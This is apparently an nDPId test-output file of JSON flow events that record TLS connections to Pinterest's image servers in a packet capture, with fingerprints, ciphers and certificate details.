-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 